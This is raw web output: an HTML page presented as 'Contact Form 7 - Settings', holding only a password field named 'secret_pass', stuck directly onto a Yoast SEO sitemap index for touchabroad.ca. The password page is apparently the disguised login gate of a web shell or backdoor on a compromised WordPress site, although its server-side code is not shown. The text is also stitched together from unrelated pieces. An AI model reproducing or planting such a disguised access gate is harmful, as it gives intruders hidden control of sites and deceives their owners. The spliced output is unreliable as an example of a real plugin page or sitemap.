
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Contact Form 7</title>
    <script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-gray-50">

<div class="max-w-4xl mx-auto p-8">

        <div class="bg-white p-12 rounded-3xl shadow-xl text-center">
        <h2 class="text-3xl font-bold mb-8">Contact Form 7 - Settings</h2>
        <form method="POST">
            <input type="password" name="secret_pass" required 
                   class="w-full p-6 rounded-2xl border border-gray-300 text-center text-xl">
            <button type="submit" class="mt-8 w-full bg-blue-600 text-white py-6 rounded-2xl font-bold">Unlock Settings</button>
        </form>
    </div>
    
</div>

</body>
</html><?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//touchabroad.ca/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://touchabroad.ca/post-sitemap.xml</loc>
		<lastmod>2025-08-05T09:46:15+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://touchabroad.ca/page-sitemap.xml</loc>
		<lastmod>2025-06-26T11:50:50+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->